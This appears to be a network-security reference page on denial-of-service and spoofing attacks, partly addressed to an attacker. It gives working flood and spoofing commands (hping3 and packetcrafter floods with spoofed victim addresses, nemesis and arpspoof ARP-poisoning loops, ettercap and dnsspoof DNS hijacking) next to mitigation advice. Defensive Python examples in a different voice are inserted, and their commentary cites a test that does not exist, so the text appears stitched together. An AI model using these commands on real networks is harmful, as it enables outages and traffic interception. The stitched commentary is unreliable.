
Malicious packets are used to exploit the computer's vulnerabilities

When you send out malicious packets, you probably want to know whether they were
received by the victims
o you'd need to watch your work and the packets as you progress through your
attack
o you'd need a good sniffer
o you'd need a good understanding of the data the sniffer shows you

there are over a million different viruses but not nearly as many worms ...
o a virus usually attaches itself to email and requires people to propagate it
Don't click on email attachments and you probably will NOT get
infected with a virus
o a worm does NOT need people; it can propagate and infect
computers on its own

Generating Custom DDoS Packets

Various Packet Crafting Apps are readily available
o http Flood, ICMP Flood, SMTP flood, SSH Flood, UDP flood, etc

Live Online Packet Crafting Demo

o bsd.Packet-Craft.net/Demo Demo DDoS GUI
just enter your destination IP in the GUI for a quick demo

o Generate 1,000,000 arp packets at 10,000 packets/sec ( ARP flood )
packetcrafter.pl -skip -cli -arp -src spoofVictimIP -dst zombieIP -c 1000000 -i 0.0001

o Generate 1,000,000 icmp packets at 10,000 packets/sec ( ICMP flood )
packetcrafter.pl -skip -cli -icmp -src spoofVictimIP -dst zombieIP -c 1000000 -i 0.0001

o Generate 1,000,000 udp packets at 10,000 packets/sec ( UDP flood )
packetcrafter.pl -skip -cli -udp -src spoofVictimIP -dst zombieIP -c 1000000 -i 0.0001

Other Bandwidth Flooding methodologies

Denial-of-Service Overview

Juniper.net DOS Attacks
Juniper.net DOS Detection and Prevention

Juniper.net Network DoS Attacks
Juniper.net ICMP Flood Attacks
Juniper.net LAND Attacks
Juniper.net SYN Flood Attacks
Juniper.net UDP Flood Attacks
Juniper.net SYN Cookie protection
Juniper.net Firewall DoS Attacks
Juniper.net Attacker Evasion Techniques




ICMP Attacks

non-ICMP Ping Attacks
Ping Attacks
o ICMP DoS attack
Attacker sends ICMP "time exceeded" or "destination unreachable" to
both victims

o ICMP Sweeps
Attacker sends icmp echo requests to the entire network and deduces OS
types from the icmp replies
uses the TTL value, nmap, superscan, traceroute ..

o Ping flood attack
gazillion different ways to do this

o Ping of Death
The attacker sends a packet larger than the target OS can handle,
which the OS cannot reassemble, so it crashes ( Windows-95, Windows-98 )
Packet size > 65,535 was fixed in linux-2.0.24
ping -s 65536 VictimIPAddress

o Ping Nuke attack ( aka Blue Screen for Windows 95, NT and 3.1X )

Minimize ICMP Attacks
o ICMP and UDP attacks cannot be prevented ... they are stateless
the packets will come down the pipe regardless of what you do or
don't do
you can stop icmp/udp flood attacks only by telling your ISP to drop
the packets at their end of your pipe

you can NOT tarpit incoming ICMP/UDP packets
you can define connection limits for incoming ICMP/UDP packets
you can define bandwidth limits for incoming ICMP/UDP packets

ICMP Smurf Attacks



The trick for Smurf attacks is to find networks that are misconfigured and allow
"broadcast ping"
o Some of the misconfigured networks are listed at the Smurf Amplifier Registry

The attacker gets lots of machines to send ICMP echo replies to the
VictimIPAddress, probably slowing the victim's internet connectivity to a crawl
o for best effect, you'd send your icmp echo request to a smurf broadcast amplifier
o your outgoing icmp request should carry the "spoofed source address"
VictimIPAddress ( which never sent the initial ping request )

#
# in the best case, you should NOT get any replies for doing a "ping broadcast"
# it's a BAD thing to get replies for "ping broadcasts"
linux# ping -b 192.168.255.255
bsd# ping 192.168.255.255

#
# up to 64,000 (misconfigured) hosts could reply by sending a ping reply to the VictimIPAddress
sing -echo -s 1024 -S VictimIPAddress 192.168.255.255

hping3 -1 --flood -a VictimIPAddress 192.168.255.255

nemesis icmp -i 8 -S 192.168.1.10 -D 192.168.255.255

For Smurf Attack Testing Purposes only
o for smurf testing, allow icmp broadcast on some of your non-critical
computers
#
# each of these PCs will reply to the incoming ping broadcast ( smurf testing only )
echo 0 > /proc/sys/net/ipv4/icmp_echo_ignore_broadcasts
o for smurf testing, allow ping broadcasts through your firewall

Preventing Smurf Attacks
o Check for computers, routers, printers, etc that reply to broadcast ping
ping -b 192.168.255.255
ping -b 192.168.0.0
nmap -n -sP -PI -oN /tmp/smurf.log 'w.x.y.z/24'

o turn off icmp broadcast replies on ALL your computers, routers, printers, etc
echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_broadcasts

o change your firewall rules
OregonTechSupport.com detailed iptables rules for ICMP ( local copy )
Allow OUTbound Echo Request
Allow inbound Echo Reply messages
Allow inbound Traceroute TTL-Exceeded
Allow inbound Port Unreachable messages
Allow inbound Path MTU messages
Allow inbound Fragmentation-DF-Set messages
iptables -A INPUT -p icmp -m icmp --icmp-type address-mask-request -j DROP
iptables -A INPUT -p icmp -m icmp --icmp-type timestamp-request -j DROP
iptables -A INPUT -p icmp -m limit --limit 1/second -j ACCEPT

non-ICMP Ping Attacks
arping
tcping
udpping, echoping
Fraggle attack
o Fraggle uses UDP instead of icmp
o Fraggle uses specific ports ( echo, chargen )

nemesis udp -x echo -y chargen -S 192.168.0.1 -D 192.168.0.2

ARP Attacks ( ARP Spoofing, ARP Poisoning, ARP Cache Poisoning )

WikiPedia.org ARP Spoofing


grc.com nice simple pix ( local copy )

blog.zorinaq.com
# victim# arp who-has 10.2.32.1 tell 10.2.44.90
# Attacker# runs nemesis
nemesis arp -h 00:de:ad:be:ef:00 -S 10.2.44.90 -m 0:0:0:0:0:0 -D 10.2.32.1 -M 00:30:48:xx:xx:xx

daviddodd.sys-con.com same as admin-magazine.com
Admin-Magazine.com Arp-Cache-Poisoning-and-Packet-Sniffing
while true
do
#
# keep it poisoned .. refresh the victim's arp cache every 10 seconds
#
nemesis arp -v -r -d eth0 -S 192.168.1.2 \
-D 192.168.1.133 -h 00:22:6E:71:04:BB -m 00:0C:29:B2:78:9E \
-H 00:22:6E:71:04:BB -M 00:0C:29:B2:78:9E
#
# tell the other side too
nemesis arp -v -r -d eth0 -S 192.168.1.133 \
-D 192.168.1.2 -h 00:22:6E:71:04:BB -m 00:22:6B:7E:AD:7C \
-H 00:22:6E:71:04:BB -M 00:22:6B:7E:AD:7C
#
sleep 10
done

WordPress.com ARP Cache Poisoning
arpspoof -i eth0 -t victimIP gatewayIP
arpspoof -i eth0 -t gatewayIP victimIP
sysctl -w net.ipv4.ip_forward=1

usc.edu ARP spoof Lab
#
# sniff data between 10.1.1.2 and 10.1.1.6
ettercap -T -M arp /10.1.1.2/ /10.1.1.6/

WatchGuard.com ARP Cache Poisoning
create an ARP reply packet with any arbitrary IP# and the attacker's MAC address
all packets for that faked/hijacked IP# ( the victim's ) will now go to the
attacker's computer
ARP Poisoning to implement a Denial of Service ( DoS ) Attack
o when your gateway router accepts the fake ARP reply packet, you are now offline

ARP Poisoning to implement a Man-in-the-Middle ( MITM ) Attack
o the attacker sends an ARP reply to the router with the victim's IP# and the
attacker's MAC address
o the attacker sends an ARP reply to the victim with the router's IP# and the
attacker's MAC address
o all packets between victim and router will now pass through the attacker's computer

ARP Poisoning to implement a MAC Flooding Attack
o the attacker sends thousands of fake arp replies to the victim ( routers, switches,
PCs )

Minimize Problems from ARP Spoofing
the attacker will probably need to be inside the local LAN to carry out an arp poisoning
attack
o the attacker can gain local LAN access if there's a misconfigured and insecure
router/gateway/server/firewall
o the attacker can gain local LAN access if there's a misconfigured and insecure
wifi access point
o the attacker can gain local LAN access by dropping a trojan horse onto the
victim's PC while they are at an insecure internet cafe, airport, hotel, etc
it can be as simple and fun as a "call home" via cron and/or startup scripts
each time the victim's machine is booted

use S-ARP ( secure ARP ) instead
ArpON ( ARP handler inspectiON )
ARPDefender ( commercial appliance )
XArp
install ARP monitoring packages .. eg ARPwatch
configure your firewall with IP# and MAC address pairs
check your log files ( /var/log/messages )
disallow DHCP that lets "anybody" into your LAN
disallow wifi connectivity that lets "anybody" into your LAN
Use static ARP entries; static entries cannot be updated by ARP replies
o protect switches and gateways with static entries
o protect login servers, mail servers, web servers with static entries

for all routers, switches, PCs and devices on the LAN, add an entry into the static arp
table
o arp -s hostname mac_addr
o arp -d ip_address # to delete an address

make sure your switch allows only 1 MAC address per port, but that one MAC address
could still be the attacker's
make sure your switch does NOT drop to "hub" mode
make sure your switch has "sticky arp" enabled
disable un-used ports on your switch
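An ARPwatch-style check of the kind the list above recommends, written as an added example (it is not code from this page, from ARPwatch or from ArpON): it replays a stream of ARP replies and raises the alerts a monitor would, including the pattern described earlier where one MAC answers for both the gateway and a host. The replies, addresses and MACs are constructed, and the static_entries table plays the role of the `arp -s` entries above.

```python
from collections import defaultdict

# Constructed ARP replies (not a capture): (timestamp, sender IP, sender MAC).
# 192.168.1.1 is the gateway, 192.168.1.2 a host, ...:ee a third station.
SAMPLE_REPLIES = [
    ("12:00:00", "192.168.1.1", "00:11:22:33:44:01"),
    ("12:00:01", "192.168.1.2", "00:11:22:33:44:02"),
    ("12:00:10", "192.168.1.1", "00:11:22:33:44:EE"),  # someone else claims the gateway
    ("12:00:10", "192.168.1.2", "00:11:22:33:44:EE"),  # ... and the host: both sides poisoned
    ("12:00:20", "192.168.1.1", "00:11:22:33:44:01"),  # the real gateway answers again
]


class ArpMonitor:
    """Track IP -> MAC bindings seen in ARP replies and flag suspicious changes."""

    def __init__(self, static_entries=None, ips_per_mac_alert=2):
        self.static = {ip: mac.lower() for ip, mac in (static_entries or {}).items()}
        self.table = dict(self.static)          # current belief: ip -> mac
        self.history = defaultdict(set)         # ip -> every mac ever seen for it
        for ip, mac in self.table.items():
            self.history[ip].add(mac)
        self.ips_by_mac = defaultdict(set)      # mac -> ips it has answered for
        self.ips_per_mac_alert = ips_per_mac_alert

    def observe(self, ts, ip, mac):
        """Feed one reply; return the alerts it triggered as (ts, kind, subject, detail)."""
        mac = mac.lower()
        alerts = []
        old = self.table.get(ip)
        if old is None:
            alerts.append((ts, "new station", ip, mac))
            self.table[ip] = mac
        elif old != mac:
            if ip in self.static:
                # a configured static entry is never overwritten by a reply
                alerts.append((ts, "static entry contradicted", ip, mac))
            elif mac in self.history[ip]:
                # the binding went back to a MAC seen before: classic poison/recover pattern
                alerts.append((ts, "flip flop", ip, f"{old} -> {mac}"))
                self.table[ip] = mac
            else:
                alerts.append((ts, "changed ethernet address", ip, f"{old} -> {mac}"))
                self.table[ip] = mac
        self.history[ip].add(mac)
        before = len(self.ips_by_mac[mac])
        self.ips_by_mac[mac].add(ip)
        # fire once, when a MAC first answers for the threshold number of addresses
        if before < self.ips_per_mac_alert <= len(self.ips_by_mac[mac]):
            claimed = ",".join(sorted(self.ips_by_mac[mac]))
            alerts.append((ts, "one MAC answers for several IPs", mac, claimed))
        return alerts


def run_monitor(replies, static_entries=None):
    """Replay a list of replies and return every alert raised, in order."""
    mon = ArpMonitor(static_entries)
    alerts = []
    for ts, ip, mac in replies:
        alerts.extend(mon.observe(ts, ip, mac))
    return alerts


if __name__ == "__main__":
    for alert in run_monitor(SAMPLE_REPLIES):
        print(*alert)
```

With no static entries the replay produces two "new station" alerts, two "changed ethernet address" alerts, the "several IPs" alert for the ...:ee station and a final "flip flop" when the real gateway speaks again; with the gateway pinned as a static entry the gateway alert becomes "static entry contradicted" and the table keeps the configured MAC.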

DNS Attacks ( DNS Spoofing, DNS Cache Poisoning )

Packet-Craft.net/Malicious/#DNSamp DNS Amplification Attacks

Wikipedia.org DNS Spoofing
MenandMice.com nice spoof pix
Secure.MenandMice.com offline DNS test via email
GRC.com DNS Spoofability ( live online test )

wordPress.com DNS Spoofing
cat spoofhosts.txt
192.168.1.100 mail*
192.168.1.100 www*

echo 1 > /proc/sys/net/ipv4/ip_forward    # enable IP forwarding
arpspoof -t 192.168.1.245 192.168.1.5
arpspoof -t 192.168.1.5 192.168.1.245
dnsspoof -f spoofhosts.txt host 192.168.1.245 and udp port 53

blogspot.com
o vi ../ettercap/etter.dns
#
# example spoofing microsoft
microsoft.com A 198.182.196.56
*.microsoft.com A 198.182.196.56
www.microsoft.com PTR 198.182.196.56
#
# example spoofing google
google.com A 64.148.32.238
*.google.com A 64.148.32.238
www.google.com PTR 64.148.32.238
#
# End of etter.dns

o Run ettercap in text mode, quietly dns-spoofing as Man-in-The-Middle for all
hosts
ettercap -T -q -i eth0 -P dns_spoof -M arp // //

jon.oberheide.org .. DNS spoofing w/ python + dpkt
import pcap    # pypcap
# capture udp dst port 53 for DNS
pc = pcap.pcap()
pc.setfilter('udp dst port 53')

... long list of commands ..

code.Google.com dnsspoof.cpp
requires the LibCrafter library

Minimize Problems from DNS Spoofing
o see minimize ARP spoofing
o use the latest version of BIND
o run DNS in a chroot environment
o Enable DNSSEC
o Run IPsec
o DNS servers should disallow arbitrary zone transfers
o Install Network Monitors ( might be too late )
o hard code important IP#s ( eg. banks.com ) into /etc/hosts ( but /etc/hosts can be
trojaned too )

Corpocrat.com Securing your DNS Server

GIAC.org Practical Perl for Security

NetWidget.net Measures to prevent DNS spoofing
dn9a.nl DNS Anti Spoofing

LAND Attacks ( banana attack )

send a spoofed TCP SYN packet to the victim IP address
the source and destination addresses are both the victim's

hping -S -a w.x.y.z -p 21 w.x.y.z


hping3 -V -c 1000000 -d 120 -S -w 64 -p 445 -s 445 --flood --rand-source VictimIP

hping3 -S VictimIP -a VictimIP -k -s 139 -p 139 --flood

MAC Flood attack

primarily worrisome for routers and switches
Some switches drop back into hub mode when their MAC address table is overloaded

Man in the Middle Attacks ( MiTM )

Intern0t.org ARP Poisoning - MiTM
#
# to become the MiTM and cause havoc:
ettercap -Tq -M arp:remote w.x.y.z -P autoadd
vi filter.pic
etterfilter filter.pic -o filter.ef
ettercap -T -q -F filter.ef -M arp:remote w.x.y.z -P autoadd

Packet Fragmentation Attack

Packet size > 65,535 was fixed in linux-2.0.24
aka the various forms of the infamous "ping of death"
Sends a packet of size 1501 > MTU ( 1500 ) with the Don't Fragment flag set
Sends a packet of size 1501 > MTU ( 1500 ) without the More Fragments flag set
Sends a packet of size 1499 < MTU ( 1500 ) with the More Fragments flag set
Sends packets with the same Src and Dst Address ( aka LAND attack )

Tech-Faq.com
1st Packet: Don't Fragment = 0 + More Fragments = 1 + Fragment Offset = 0 to port 25
2nd Packet: Don't Fragment = 0 + More Fragments = 0 + Fragment Offset = 1 to port 25
the 2nd packet overwrites the 1st packet's data ( overlapping fragments )
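The malformed fragment patterns listed above (a reassembled size beyond 65,535 bytes as in the ping of death, overlapping offsets as in the two-packet Tech-Faq case, a stream whose last fragment still says "more fragments") are what a reassembly sanity check has to catch. As an added example, not code from this page, the checker below takes a fragment set and reports which rule it breaks; the fragment sets are constructed.

```python
from dataclasses import dataclass

MAX_DATAGRAM = 65535          # the IPv4 total-length field is 16 bits


@dataclass
class Fragment:
    offset: int               # payload offset in bytes (the header field times 8)
    length: int               # payload bytes carried by this fragment
    more_fragments: bool      # MF flag
    dont_fragment: bool = False   # DF flag


def check_fragments(frags):
    """Return the problems found in a fragment set; an empty list means it reassembles cleanly."""
    if not frags:
        return ["no fragments"]
    problems = []
    ordered = sorted(frags, key=lambda f: f.offset)
    for f in ordered:
        # every fragment but the last must carry a multiple of 8 bytes
        if f.more_fragments and f.length % 8:
            problems.append(f"offset {f.offset}: MF set but length {f.length} is not a multiple of 8")
        if f.dont_fragment and (f.more_fragments or f.offset):
            problems.append(f"offset {f.offset}: DF set on a fragment, contradictory flags")
        if f.offset + f.length > MAX_DATAGRAM:
            problems.append(f"offset {f.offset}: reassembles beyond {MAX_DATAGRAM} bytes (ping-of-death pattern)")
    if ordered[0].offset != 0:
        problems.append("no fragment with offset 0")
    end = 0                   # bytes of payload accounted for so far
    for f in ordered:
        if f.offset < end:
            problems.append(f"offset {f.offset}: overlaps data already received up to {end} (teardrop pattern)")
        elif f.offset > end:
            problems.append(f"gap between {end} and {f.offset}")
        end = max(end, f.offset + f.length)
    if ordered[-1].more_fragments:
        problems.append("last fragment has MF set: datagram never completes, reassembly buffer stays allocated")
    return problems


# Constructed fragment sets (not captures); 1480 is the payload of a 1500-byte MTU frame.
CLEAN = [Fragment(0, 1480, True), Fragment(1480, 20, False)]
PING_OF_DEATH = [Fragment(o, 1480, True) for o in range(0, 65120, 1480)] + [Fragment(65120, 500, False)]
TEARDROP = [Fragment(0, 1480, True), Fragment(8, 1480, False)]   # the "Fragment Offset = 1" (8 bytes) case above
INCOMPLETE = [Fragment(0, 1480, True)]                            # never finished, as in a fragment flood

if __name__ == "__main__":
    for name, frags in [("clean", CLEAN), ("ping of death", PING_OF_DEATH),
                        ("teardrop", TEARDROP), ("incomplete", INCOMPLETE)]:
        print(name, check_fragments(frags) or "ok")
```

The PING_OF_DEATH set is contiguous and well formed until the last fragment pushes the total past 65,535, which is exactly why a stack that checked each fragment on its own but not the running total could be crashed by it.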

SYN Flood Attack

Normally, you send out a packet with the SYN flag and wait for the SYN+ACK reply
o Each SYN received consumes system memory and sits in the OS's
backlog queue until the handshake completes or times out

The attacker will send a huge number ( hundreds, thousands ) of packets with the SYN flag set
to the TargetHost
o you will need to know the size of the tcp connection backlog queue
o you will need to know the timeout period for half-open tcp connections

# -a is the spoofed source address; send 1000 SYN packets/sec to Victim
hping -a SpoofedSrc -S VictimIP -p 80 -i u1000
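SYN cookies are the standard answer to the backlog problem described above (the "SYN Cookie protection" link in the overview covers the same idea): the server encodes what it would otherwise have to remember into the initial sequence number of its SYN+ACK, so a half-open connection costs no memory until the client's ACK proves the handshake is real. As an added example, not code from this page or from any operating system, here is a small cookie scheme following the Linux/BSD layout of a 5-bit time counter, a 3-bit MSS index and a 24-bit keyed tag; the MSS table, the secret, the addresses and the choice of HMAC-SHA256 are my assumptions.

```python
import hashlib
import hmac
import struct

MSS_TABLE = [536, 1300, 1440, 1460]   # MSS values that fit the 3-bit index (assumed table)
COUNTER_PERIOD = 64                    # seconds per tick of the 5-bit time counter
MASK32 = 0xFFFFFFFF


def _tag24(secret, src, dst, sport, dport, counter):
    """24-bit keyed tag binding the cookie to the 4-tuple and the time counter."""
    msg = struct.pack("!4s4sHHI", src, dst, sport, dport, counter)
    return int.from_bytes(hmac.new(secret, msg, hashlib.sha256).digest()[:3], "big")


def make_cookie(secret, src, dst, sport, dport, client_isn, mss, now):
    """Server ISN for the SYN+ACK; nothing is stored for this half-open connection."""
    counter = (int(now) // COUNTER_PERIOD) & 0x1F
    mss_idx = 0
    for i, m in enumerate(MSS_TABLE):      # largest table entry not above the offered MSS
        if m <= mss:
            mss_idx = i
    payload = (counter << 27) | (mss_idx << 24) | _tag24(secret, src, dst, sport, dport, counter)
    return (client_isn + 1 + payload) & MASK32


def check_cookie(secret, src, dst, sport, dport, ack_seq, ack_num, now, max_age_ticks=1):
    """Validate the client's final ACK (seq = client_isn + 1, ack = cookie + 1).
    Returns the MSS to use, or None if the ACK does not prove a real handshake."""
    payload = (ack_num - 1 - ack_seq) & MASK32
    counter, mss_idx, tag = payload >> 27, (payload >> 24) & 0x7, payload & 0xFFFFFF
    current = (int(now) // COUNTER_PERIOD) & 0x1F
    if (current - counter) & 0x1F > max_age_ticks:
        return None                                    # stale (or from the future)
    if tag != _tag24(secret, src, dst, sport, dport, counter):
        return None                                    # forged, or a different 4-tuple
    return MSS_TABLE[mss_idx]


# Constructed values (not from the page)
SECRET = b"rotate-me-regularly"
CLIENT = bytes([198, 51, 100, 23])
SERVER = bytes([203, 0, 113, 80])


def handshake_demo(now=1000):
    """One legitimate handshake and one forged ACK; returns (mss_ok, mss_forged)."""
    client_isn = 0x11223344
    cookie = make_cookie(SECRET, CLIENT, SERVER, 40000, 80, client_isn, 1460, now)
    seq = (client_isn + 1) & MASK32
    ok = check_cookie(SECRET, CLIENT, SERVER, 40000, 80, seq, (cookie + 1) & MASK32, now)
    forged = check_cookie(SECRET, CLIENT, SERVER, 40000, 80, seq, (cookie + 2) & MASK32, now)
    return ok, forged


if __name__ == "__main__":
    print(handshake_demo())   # legitimate ACK yields the MSS, the forged one yields None
```

The cost of the scheme is visible in the code: only the MSS values in the table survive, and an ACK older than max_age_ticks counter periods is rejected, which is why kernels enable cookies only once the backlog actually overflows rather than all the time.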

TCP Reset Flood Attack

the attacker sends a RST packet to either or both victim hosts

TCP Sequence Number Attack ( TCP Session Hijacking )

Normal TCP sequence of events
o HostA sends a SYN packet to HostB
o HostB replies to HostA with SYN + ACK flags and ACKnumber = HostA
SequenceNumber+1
o HostA sends SYN + ACK flags and ACKnumber = HostB SequenceNumber+1

TCP Sequence Attacks
o the attacker floods HostB ( to stop it for a while ) and
o the attacker sends the expected ACKnumber back to HostA and
the attacker sends a RST to HostB, taking HostB's place

gulker.com mitnick - shinomura ( local copy )

DNS ( UDP ) Amplification Attacks

Packet-Craft.net/Malicious/#DNSspoof DNS spoof Attacks
DNS Amplification basically consists of
o the attacker sends out a typical dns request ( udp packet ), "where is
www.example.com"
but uses a spoofed source address belonging to the Victim
o these spoofed DNS requests are sent to open dns resolvers ( recursion allowed
for everybody )
o the amplification is more effective with DNS servers that support udp
packets > 512 bytes ( EDNS0 )
o the Victim receives tons of replies for "where is www.example.com"

Nirlog.com DNS Amplification
SecurityTNT.com DNS Amplification ( duplicate of Nirlog.com )

( figures: Normal DNS Requests, 7 steps; DNS Amplification, 9 steps )


UDP Flood Attack

send udp flood packets to an entire Class-B and/or Class-C address range
o send udp flood packets to port 53, which cannot simply be dropped

send a large number ( 100,000 p/s ) of UDP packets/sec to random ports of the victim
o to fill up the available bandwidth
o to use up all resources ( cpu, memory, buffers, etc ) available on the victim

if no app is listening on the udp port being attacked,
the victim sends back an ICMP "destination unreachable" packet
o ( self-DOSing ) generating more useless packets filling up the bandwidth
o use iptables to DROP outgoing ICMP "destination unreachable" packets

Minimize UDP Attacks
o ICMP and UDP attacks cannot be prevented ... they are stateless
the packets will come down the pipe regardless of what you do or don't do
you can stop icmp/udp flood attacks only by telling your ISP to drop the
packets at their end of your pipe
you can NOT tarpit incoming ICMP/UDP packets
you can define connection limits for incoming ICMP/UDP packets
you can define bandwidth limits for incoming ICMP/UDP packets

o you should NOT arbitrarily DROP UDP traffic with firewalls (eg.
iptables)
udp packets are REQUIRED for dns lookups and replies

o Selectively, try to limit the incoming UDP packets

# drop any source holding more than 20 udp "connections" ( conntrack entries )
# at any given time
iptables -A INPUT -p udp -d dns.server --dport 53 \
-m connlimit --connlimit-above 20 -j DROP

# limit the number of udp packets accepted per minute after an initial
# allowed burst of 10
iptables -A INPUT -p udp -d dns.server --dport 53 \
-m limit --limit 1/min --limit-burst 10 -j ACCEPT

# drop udp packets exceeding the above limits, presumably due to UDP flooding
# CAREFUL .. you can drop legitimate DNS queries
# if the above limits are too low for your busy DNS server
iptables -A INPUT -p udp -d dns.server --dport 53 -j DROP
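To make the CAREFUL note above concrete, this added example (not from the page) simulates the token bucket behind `-m limit` with the rule's own numbers, 1/min with a burst of 10, against a constructed legitimate resolver and a constructed flood. It also goes one step further than the page's rule and shows why a per-source bucket (what the hashlimit match provides) keeps a flood from starving the legitimate source, which the single shared bucket of plain `-m limit` cannot do. The traffic and addresses are constructed.

```python
from collections import defaultdict


class TokenBucket:
    """Token bucket with the semantics of iptables -m limit: a bucket holding
    `burst` tokens that refills at `rate` tokens per second; each match costs one."""

    def __init__(self, rate, burst):
        self.rate = float(rate)
        self.burst = float(burst)
        self.tokens = float(burst)
        self.last = None

    def allow(self, now):
        if self.last is not None:
            self.tokens = min(self.burst, self.tokens + (now - self.last) * self.rate)
        self.last = now
        if self.tokens >= 1.0:
            self.tokens -= 1.0
            return True
        return False


def simulate(packets, rate, burst, per_source=True):
    """packets: list of (time_seconds, source_ip). Returns {src: (accepted, dropped)}.
    per_source=True keys one bucket per source (hashlimit --hashlimit-mode srcip style);
    per_source=False uses one shared bucket, as plain -m limit does."""
    shared = TokenBucket(rate, burst)
    buckets = defaultdict(lambda: TokenBucket(rate, burst))
    counts = defaultdict(lambda: [0, 0])
    for t, src in sorted(packets, key=lambda p: p[0]):
        bucket = buckets[src] if per_source else shared
        counts[src][0 if bucket.allow(t) else 1] += 1
    return {src: tuple(c) for src, c in counts.items()}


# Constructed traffic (not a capture): a resolver that asks one question every
# 2 seconds for a minute, and a flood source sending 1000 packets inside one second.
LEGIT = [(t, "198.51.100.77") for t in range(0, 60, 2)]        # 30 packets in a minute
FLOOD = [(i / 1000.0, "203.0.113.7") for i in range(1000)]


def compare():
    """What '--limit 1/min --limit-burst 10' does to both sources, per-source vs shared."""
    per_src = simulate(LEGIT + FLOOD, rate=1 / 60, burst=10, per_source=True)
    shared = simulate(LEGIT + FLOOD, rate=1 / 60, burst=10, per_source=False)
    return per_src, shared


if __name__ == "__main__":
    per_src, shared = compare()
    print("per-source buckets:", per_src)
    print("one shared bucket: ", shared)
```

With the page's numbers the flood is cut to 10 packets, but so is the resolver: a client sending one query every 2 seconds gets only its first 10 through and the remaining 20 are dropped, because 1/min refills far slower than half a packet per second. With a shared bucket the flood additionally drains the tokens the resolver needed, so at most one of its queries survives; raising the rate to 1/s (the last assertion in the test) lets all 30 legitimate queries pass.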

o To see what services are running that require UDP packets
lsof -i UDP
udp packets for DNS .. cannot be dropped
udp packets for NFS .. could be dropped if you do NOT use NFS
you can use secure NFS apps
udp packets for ntp .. could be dropped if exact time
synchronization is NOT required
you could use another time sync: ntpdate


Minimizing Effects of UDP flood Attacks against your DNS servers
DDoS udp flood from source port 25345 attacking your dns server port 53 .... aka
isc.org/ANY attacks

isc.org
MenandMice.com
CloudFlare.com Deep Inside a DNS Amplification DDoS Attack
MiniHowto.eu Protection Against isc.org ANY Attack
use bind-9.4.1-p1 or later
Log Entries indicating an "isc.org attack"
o tcpdump -n 'udp and dst net w.x.y.z/24 and dst port 53'
# -- hundreds of thousands of these entries --
time stamp IP victimIP.25345 > yourDNSserver.53: 10809+ [1au] ANY? isc.org. (36)
time stamp IP victimIP.29400 > yourDNSserver.53: 10809+ [1au] ANY? isc.org. (36)
time stamp IP victimIP.49940 > yourDNSserver.53: 10809+ [1au] ANY? isc.org. (36)

o bind log entries
o /var/log/messages
o udp-flood.pl script to find any new UDP flooders ( isc.org ) attacking from port
*.25345
350+ zombies have already UDP-flooded our network
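A small parser for tcpdump lines in the shape shown above, as an added example (it is not the page's udp-flood.pl, which is not shown): it groups queries by source address and flags the two tells visible in those log entries, a burst of ANY queries and the same transaction id repeated on every packet. The sample lines are constructed in the same shape, with 203.0.113.7 playing the spoofed victim and 198.51.100.2 the DNS server.

```python
import re
from collections import defaultdict

# Constructed tcpdump -n lines (not a capture), one DNS query each.
SAMPLE_LINES = [
    "12:00:00.000001 IP 203.0.113.7.25345 > 198.51.100.2.53: 10809+ [1au] ANY? isc.org. (36)",
    "12:00:00.000120 IP 203.0.113.7.25345 > 198.51.100.2.53: 10809+ [1au] ANY? isc.org. (36)",
    "12:00:00.000301 IP 203.0.113.7.29400 > 198.51.100.2.53: 10809+ [1au] ANY? isc.org. (36)",
    "12:00:00.000450 IP 203.0.113.7.49940 > 198.51.100.2.53: 10809+ [1au] ANY? isc.org. (36)",
    "12:00:00.000603 IP 203.0.113.7.25345 > 198.51.100.2.53: 10809+ [1au] ANY? isc.org. (36)",
    "12:00:01.120000 IP 198.51.100.77.51021 > 198.51.100.2.53: 4471+ A? www.example.com. (33)",
    "12:00:01.130000 IP 198.51.100.77.51022 > 198.51.100.2.53: 4472+ AAAA? www.example.com. (33)",
    "this line is not a DNS query and is skipped",
]

LINE_RE = re.compile(
    r"^(?P<ts>\S+) IP (?P<src>\d+(?:\.\d+){3})\.(?P<sport>\d+) > "
    r"(?P<dst>\d+(?:\.\d+){3})\.(?P<dport>\d+): (?P<txid>\d+)\+? (?:\[1au\] )?"
    r"(?P<qtype>[A-Z0-9]+)\? (?P<qname>\S+) \((?P<len>\d+)\)$"
)


def parse_line(line):
    """Return the fields of one tcpdump DNS query line, or None if it is not one."""
    m = LINE_RE.match(line)
    if not m:
        return None
    q = m.groupdict()
    for key in ("sport", "dport", "txid", "len"):
        q[key] = int(q[key])
    return q


def find_any_floods(lines, min_queries=3):
    """Group queries by source and return {src: [reasons]} for sources that look like a flood."""
    stats = defaultdict(lambda: {"total": 0, "any": 0, "sports": set(), "txids": set(), "qnames": set()})
    for line in lines:
        q = parse_line(line)
        if q is None or q["dport"] != 53:
            continue
        s = stats[q["src"]]
        s["total"] += 1
        s["sports"].add(q["sport"])
        s["txids"].add(q["txid"])
        s["qnames"].add(q["qname"])
        if q["qtype"] == "ANY":
            s["any"] += 1
    flagged = {}
    for src, s in stats.items():
        reasons = []
        if s["any"] >= min_queries:
            reasons.append(f"{s['any']} ANY queries for {','.join(sorted(s['qnames']))}")
        # a real resolver picks a fresh transaction id per query; a replayed flood does not
        if s["total"] >= min_queries and len(s["txids"]) == 1:
            reasons.append(f"same transaction id {next(iter(s['txids']))} on every query")
        if reasons:
            flagged[src] = reasons
    return flagged


if __name__ == "__main__":
    import sys
    lines = sys.stdin if not sys.stdin.isatty() else SAMPLE_LINES
    for src, reasons in find_any_floods(lines).items():
        print(src, "; ".join(reasons))
```

Fed from `tcpdump -n -l ... | python3 thisfile.py` it reports the flagged sources as they accumulate; note that the flagged address is the spoofed victim, not the flooding hosts, which is why the page's advice is to drop these queries rather than to block the "source".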

Harden your DNS server by Turning Off Recursion
o in /var/log/messages
TimeStamp dnsServer named[]: client victimIP#port: query (cache) 'xxx.Google.com/MX/IN'
these DNS queries should ALL say "denied" in /var/log/messages
if they don't show as denied you will need to turn off or
limit recursive dns queries

o vi /var/named/named.conf ...
# Only allow recursive DNS lookups for yourself ( localhost, localnets
# and w.x.y.z/24 )
# all other dns queries from outsiders should be denied ( not an
# open/public dns server )
acl "trusted" {
localhost;
localnets;
w.x.y.z/24;
}; # end acl
...
options {
# only IP#s and networks listed in "trusted" can do recursive dns
# lookups
recursion yes; # default is to allow recursion
allow-recursion { trusted; };
allow-transfer { secondary.dns.server; tertiary.dns.server; };
allow-query { any; };
}; # end options

Allow only a limited number of incoming UDP packets to port 53 to minimize UDP flooding
o simply DROP ALL udp packets from port 25345 ( the ANY isc.org udp flood
attacks )
o simply DROP ALL udp packets from port 29400 ( the ANY isc.org udp flood
attacks )
